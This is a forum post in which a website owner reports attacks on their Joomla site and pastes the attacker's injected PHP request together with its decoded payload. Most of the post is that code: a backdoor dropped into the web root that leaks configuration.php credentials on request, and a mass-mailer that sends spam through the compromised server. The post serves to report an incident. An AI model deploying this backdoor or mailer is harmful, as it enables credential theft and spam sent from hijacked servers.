PDA

View Full Version : Hackers must be watching this forum


peterwalker
05-02-2017, 06:25 AM
Since posting here in March to now, there have been numerous attacks at the website my-caribbeanradio.com. The latest today at 2:26pm EST using a China IP 119.254.63.253, went after the Joomla configuration.php by processing the following cryptic code via URL

[email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0); echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/error_log.php',base64_decode('PD9waHANCmlmICgkX1JF UVVFU1RbJ211aWUnXT09ImFsbCIpIHsNCiRzID0kX1NFUlZFUl snU0VSVkVSX05BTUUnXTskYz1iYXNlNjRfZW5jb2RlKGZpbGVf Z2V0X2NvbnRlbnRzKCdjb25maWd1cmF0aW9uLnBocCcpKTtlY2 hvICRzIC4gIiAiIC4gJGM7DQp9DQpzZXRfdGltZV9saW1pdCgw KTsNCmlnbm9yZV91c2VyX2Fib3J0KHRydWUpOw0KDQogICAgIC AgICRhYyA9ICRfUE9TVFsnYWMnXTsgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgIC AgICAkVmVyaWZ5PSRfUE9TVFsnVmVyaWZ5J107DQogICAgICAg ICRGcm9tPSRfUE9TVFsnRnJvbSddOw0KICAgICAgICAkUmVhbE 5hbWU9JF9QT1NUWydSZWFsTmFtZSddOw0KICAgICAgICAkU3Vi amVjdD0kX1BPU1RbJ1N1YmplY3QnXTsNCiAgICAgICAgJE1haW xCb2R5PSRfUE9TVFsnTWFpbEJvZHknXTsNCiAgICAgICAgJE1h aWxMaXN0PSRfUE9TVFsnTWFpbExpc3QnXTsNCiAgICAgICAgJE Zvcm1hdD0kX1BPU1RbJ0Zvcm1hdCddOw0KICAgICAgICAkRW5j b2Rpbmc9JF9QT1NUWydFbmNvZGluZyddOw0KICAgICAgICAkRG VsYXk9JF9QT1NUWydEZWxheSddOw0KDQogICAgICAgICRTYW5k eUtleT0kX1BPU1RbJ1NhbmR5S2V5J107DQogICAgICAgICRTYW 5keU5SQT0kX1BPU1RbJ1NhbmR5TlJBJ107DQogICAgICAgICRT YW5keU5SQj0kX1BPU1RbJ1NhbmR5TlJCJ107DQogICAgICAgIC RTYW5keVJOQT0kX1BPU1RbJ1NhbmR5Uk5BJ107DQogICAgICAg ICRTYW5keVJOQj0kX1BPU1RbJ1NhbmR5Uk5CJ107DQogICAgIC AgICRDb2RlU2l6ZT0kX1BPU1RbJ0NvZGVTaXplJ107DQoNCiAg ICAgICAgJFNBTkRZX1NFUlZFUj0kX1NFUlZFUlsnU0VSVkVSX0 5BTUUnXTsNCg0KLyogQWNjZXNzIFByb3RlY3Rpb24gKi8NCiAg JHByb3RlY3Rpb249IjFhZjk4NjA5YWRmNzk2YjIxYzlmYzczNW UzMWM1N2I3IjsNCiAgaWYobWQ1KCRWZXJpZnkpIT09JHByb3Rl Y3Rpb24peyBleGl0OyB9DQoNCg0KIGlmICgkYWM9PSJnbyIpew 0KICAkTWFpbEJvZHkgPSB1cmxlbmNvZGUoJE1haWxCb2R5KTsN CiAgJE1haWxCb2R5ID0gZXJlZ19yZXBsYWNlKCIlNUMlMjIiLC AiJTIyIiwgJE1haWxCb2R5KTsNCiAgJE1haWxCb2R5ID0gdXJs ZGVjb2RlKCRNYWlsQm9keSk7DQogICRNYWlsQm9keSA9IHN0cm lwc2xhc2hlcygkTWFpbEJvZHkpOw0KICAkU3ViamVjdCA9IHN0 cmlwc2xhc2hlcygkU3ViamVjdCk7IH0NCg0KIGlmICgkYWM9PS JnbyIpew0KIGlmICghJEZyb20gJiYgISRTdWJqZWN0ICYmICEk TWFpbEJvZHkgJiYgISRNYWlsTGlzdCl7DQogcHJpbnQgIkZpZW xkcyBtaXNzaW5nLiI7DQogZXhpdDsNCiB9DQogICRhbGxlbWFp bHMgPSBzcGxpdCgiXG4iLCAkTWFpbExpc3QpOw0KICAkbm0gPS Bjb3VudCgkYWxsZW1haWxzKTsNCiBmb3IoJHg9MDsgJHg8JG5t OyAkeCsrKXsNCiAgJHRvID0gJGFsbGVtYWlsc1skeF07DQogIC REZXN0ID0gZXhwbG9kZSgiLyIsICR0byk7DQogICREZXN0aW5h dGlvbiA9ICREZXN0WzBdOw0KDQogaWYgKCREZXN0aW5hdGlvbi l7ICAgICAgICAgICAgICAgIA0KICAkRGVzdGluYXRpb24gPSBl cmVnX3JlcGxhY2UoIiAiLCAiIiwgJERlc3RpbmF0aW9uKTsNCi AgJE1haWxCb2R5ID0gZXJlZ19yZXBsYWNlKCImZW1haWwmIiwg JERlc3RpbmF0aW9uLCAkTWFpbEJvZHkpOw0KICAkU3ViamVjdC A9IGVyZWdfcmVwbGFjZSgiJmVtYWlsJiIsICREZXN0aW5hdGlv biwgJFN1YmplY3QpOw0KICAkbnJtYWlsPSR4KzE7DQogICRkb2 1haW4gPSBzdWJzdHIoJEZyb20sIHN0cnBvcygkRnJvbSwgIkAi KSwgc3RybGVuKCRGcm9tKSk7DQoNCiAgLyogVGVtcGxhdGUgWm 9uZSAqLw0KICAkU0FORFlfTlIgPSByYW5kKCRTYW5keU5SQSwk U2FuZHlOUkIpOw0KICAkU0FORFlfUk4gPSByYW5kKCRTYW5keV JOQSwkU2FuZHlSTkIpOw0KICAkU0FORFlfSEFTSCA9IG1kNSgi JERlc3RpbmF0aW9uKyRTYW5keUtleSIpOw0KICAkU0FORFlfQ0 9ERV9MT1dFUiA9IHN1YnN0cigiJFNBTkRZX0hBU0giLCAkQ29k ZVNpemUpOw0KICAkU0FORFlfQ09ERV9VUFBFUiA9IHN0cnRvdX BwZXIoJFNBTkRZX0NPREVfTE9XRVIpOw0KICAkU0FORFlfTkFN RSA9ICREZXN0WzFdOw0KICAkU0FORFlfVU1BSUwgPSBiYXNlNj RfZW5jb2RlKCREZXN0aW5hdGlvbik7DQoNCiAgJEZyb20xID0g c3RyX3JlcGxhY2UoIlNBTkRZX05SIiwgJFNBTkRZX05SLCAkRn JvbSk7DQogICRGcm9tMiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9S TiIsICRTQU5EWV9STiwgJEZyb20xKTsNCiAgJEZyb20zID0gc3 RyX3JlcGxhY2UoIlNBTkRZX0hBU0giLCAkU0FORFlfSEFTSCwg JEZyb20yKTsNCiAgJEZyb200ID0gc3RyX3JlcGxhY2UoIlNBTk RZX0NPREVfTE9XRVIiLCAkU0FORFlfQ09ERV9MT1dFUiwgJEZy b20zKTsNCiAgJEZyb201ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0 NPREVfVVBQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJEZyb200 KTsNCiAgDQoNCiAgJFJlYWxOYW1lMSA9IHN0cl9yZXBsYWNlKC JTQU5EWV9OUiIsICRTQU5EWV9OUiwgJFJlYWxOYW1lKTsNCiAg JFJlYWxOYW1lMiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9STiIsIC RTQU5EWV9STiwgJFJlYWxOYW1lMSk7DQogICRSZWFsTmFtZTMg PSBzdHJfcmVwbGFjZSgiU0FORFlfSEFTSCIsICRTQU5EWV9IQV NILCAkUmVhbE5hbWUyKTsNCiAgJFJlYWxOYW1lNCA9IHN0cl9y ZXBsYWNlKCJTQU5EWV9DT0RFX0xPV0VSIiwgJFNBTkRZX0NPRE VfTE9XRVIsICRSZWFsTmFtZTMpOw0KICAkUmVhbE5hbWU1ID0g c3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfVVBQRVIiLCAkU0FORF lfQ09ERV9VUFBFUiwgJFJlYWxOYW1lNCk7DQoNCiAgJE1haWxC b2R5MSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9OUiIsICRTQU5EWV 9OUiwgJE1haWxCb2R5KTsNCiAgJE1haWxCb2R5MiA9IHN0cl9y ZXBsYWNlKCJTQU5EWV9STiIsICRTQU5EWV9STiwgJE1haWxCb2 R5MSk7DQogICRNYWlsQm9keTMgPSBzdHJfcmVwbGFjZSgiU0FO RFlfSEFTSCIsICRTQU5EWV9IQVNILCAkTWFpbEJvZHkyKTsNCi AgJE1haWxCb2R5NCA9IHN0cl9yZXBsYWNlKCJTQU5EWV9OQU1F IiwgJFNBTkRZX05BTUUsICRNYWlsQm9keTMpOw0KICAkTWFpbE JvZHk1ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0RFU1RJTkFUSU9O IiwgJERlc3RpbmF0aW9uLCAkTWFpbEJvZHk0KTsNCiAgJE1haW xCb2R5NiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9DT0RFX0xPV0VS IiwgJFNBTkRZX0NPREVfTE9XRVIsICRNYWlsQm9keTUpOw0KIC AkTWFpbEJvZHk3ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVf VVBQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJE1haWxCb2R5Ni k7DQogICRNYWlsQm9keTggPSBzdHJfcmVwbGFjZSgiU0FORFlf VU1BSUwiLCAkU0FORFlfVU1BSUwsICRNYWlsQm9keTcpOyANCg 0KDQogICRTdWJqZWN0MSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9O UiIsICRTQU5EWV9OUiwgJFN1YmplY3QpOw0KICAkU3ViamVjdD IgPSBzdHJfcmVwbGFjZSgiU0FORFlfUk4iLCAkU0FORFlfUk4s ICRTdWJqZWN0MSk7DQogICRTdWJqZWN0MyA9IHN0cl9yZXBsYW NlKCJTQU5EWV9IQVNIIiwgJFNBTkRZX0hBU0gsICRTdWJqZWN0 Mik7DQogICRTdWJqZWN0NCA9IHN0cl9yZXBsYWNlKCJTQU5EWV 9OQU1FIiwgJFNBTkRZX05BTUUsICRTdWJqZWN0Myk7DQogICRT dWJqZWN0NSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9ERVNUSU5BVE lPTiIsICREZXN0aW5hdGlvbiwgJFN1YmplY3Q0KTsNCiAgJFN1 YmplY3Q2ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfTE9XRV IiLCAkU0FORFlfQ09ERV9MT1dFUiwgJFN1YmplY3Q1KTsNCiAg JFN1YmplY3Q3ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfVV BQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJFN1YmplY3Q2KTsN CiAgJFN1YmplY3Q4ID0gc3RyX3JlcGxhY2UoIlNBTkRZX1NFUl ZFUiIsICRTQU5EWV9TRVJWRVIsICRTdWJqZWN0Nyk7DQoNCi8q IFNlbmRpbmcgTWFpbCAqLw0KIHByaW50ICIkbnJtYWlsOiRubT okRGVzdGluYXRpb24iOw0KIGlmKCREZWxheSAhPSAwKSB7IHNs ZWVwKCREZWxheSk7IH0NCiBmbHVzaCgpOw0KICAkaGVhZGVyID 0gIkZyb206ICRSZWFsTmFtZTUgPCRGcm9tNT5cclxuIjsNCiAg JGhlYWRlciAuPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsNCi AgJGhlYWRlciAuPSAiQ29udGVudC1UeXBlOiAkRm9ybWF0XHJc biI7DQogICRoZWFkZXIgLj0gIkNvbnRlbnQtVHJhbnNmZXItRW 5jb2Rpbmc6ICRFbmNvZGluZ1xyXG5cclxuIjsNCiAgJGhlYWRl ciAuPSAiJE1haWxCb2R5OFxyXG4iOw0KIG1haWwoJERlc3Rpbm F0aW9uLCAkU3ViamVjdDgsICIiLCAkaGVhZGVyKTsNCiBwcmlu dCAiXG4iOw0KIGZsdXNoKCk7DQogICAgfQ0KICB9DQp9DQo/Pg0KDQo='));echo '|<-';

The decoded version of the above
m^r^<?php
if ($_REQUEST['muie']=="all") {
$s =$_SERVER['SERVER_NAME'];$c=base64_encode(file_get_contents('configuration .php'));echo $s . " " . $c;
}
set_time_limit(0);
ignore_user_abort(true);

$ac = $_POST['ac'];
$Verify=$_POST['Verify'];
$From=$_POST['From'];
$RealName=$_POST['RealName'];
$Subject=$_POST['Subject'];
$MailBody=$_POST['MailBody'];
$MailList=$_POST['MailList'];
$Format=$_POST['Format'];
$Encoding=$_POST['Encoding'];
$Delay=$_POST['Delay'];

$SandyKey=$_POST['SandyKey'];
$SandyNRA=$_POST['SandyNRA'];
$SandyNRB=$_POST['SandyNRB'];
$SandyRNA=$_POST['SandyRNA'];
$SandyRNB=$_POST['SandyRNB'];
$CodeSize=$_POST['CodeSize'];

$SANDY_SERVER=$_SERVER['SERVER_NAME'];

/* Access Protection */
$protection="1af98609adf796b21c9fc735e31c57b7";
if(md5($Verify)!==$protection){ exit; }


if ($ac=="go"){
$MailBody = urlencode($MailBody);
$MailBody = ereg_replace("%5C%22", "%22", $MailBody);
$MailBody = urldecode($MailBody);
$MailBody = stripslashes($MailBody);
$Subject = stripslashes($Subject); }

if ($ac=="go"){
if (!$From && !$Subject && !$MailBody && !$MailList){
print "Fields missing.";
exit;
}
$allemails = split("\n", $MailList);
$nm = count($allemails);
for($x=0; $x<$nm; $x++){
$to = $allemails[$x];
$Dest = explode("/", $to);
$Destination = $Dest[0];

if ($Destination){
$Destination = ereg_replace(" ", "", $Destination);
$MailBody = ereg_replace("&email&", $Destination, $MailBody);
$Subject = ereg_replace("&email&", $Destination, $Subject);
$nrmail=$x+1;
$domain = substr($From, strpos($From, "@"), strlen($From));

/* Template Zone */
$SANDY_NR = rand($SandyNRA,$SandyNRB);
$SANDY_RN = rand($SandyRNA,$SandyRNB);
$SANDY_HASH = md5("$Destination+$SandyKey");
$SANDY_CODE_LOWER = substr("$SANDY_HASH", $CodeSize);
$SANDY_CODE_UPPER = strtoupper($SANDY_CODE_LOWER);
$SANDY_NAME = $Dest[1];
$SANDY_UMAIL = base64_encode($Destination);

$From1 = str_replace("SANDY_NR", $SANDY_NR, $From);
$From2 = str_replace("SANDY_RN", $SANDY_RN, $From1);
$From3 = str_replace("SANDY_HASH", $SANDY_HASH, $From2);
$From4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $From3);
$From5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $From4);


$RealName1 = str_replace("SANDY_NR", $SANDY_NR, $RealName);
$RealName2 = str_replace("SANDY_RN", $SANDY_RN, $RealName1);
$RealName3 = str_replace("SANDY_HASH", $SANDY_HASH, $RealName2);
$RealName4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $RealName3);
$RealName5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $RealName4);

$MailBody1 = str_replace("SANDY_NR", $SANDY_NR, $MailBody);
$MailBody2 = str_replace("SANDY_RN", $SANDY_RN, $MailBody1);
$MailBody3 = str_replace("SANDY_HASH", $SANDY_HASH, $MailBody2);
$MailBody4 = str_replace("SANDY_NAME", $SANDY_NAME, $MailBody3);
$MailBody5 = str_replace("SANDY_DESTINATION", $Destination, $MailBody4);
$MailBody6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $MailBody5);
$MailBody7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $MailBody6);
$MailBody8 = str_replace("SANDY_UMAIL", $SANDY_UMAIL, $MailBody7);


$Subject1 = str_replace("SANDY_NR", $SANDY_NR, $Subject);
$Subject2 = str_replace("SANDY_RN", $SANDY_RN, $Subject1);
$Subject3 = str_replace("SANDY_HASH", $SANDY_HASH, $Subject2);
$Subject4 = str_replace("SANDY_NAME", $SANDY_NAME, $Subject3);
$Subject5 = str_replace("SANDY_DESTINATION", $Destination, $Subject4);
$Subject6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $Subject5);
$Subject7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $Subject6);
$Subject8 = str_replace("SANDY_SERVER", $SANDY_SERVER, $Subject7);

/* Sending Mail */
print "$nrmail:$nm:$Destination";
if($Delay != 0) { sleep($Delay); }
flush();
$header = "From: $RealName5 <$From5>\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: $Format\r\n";
$header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n";
$header .= "$MailBody8\r\n";
mail($Destination, $Subject8, "", $header);
print "\n";
flush();
}
}
}
?>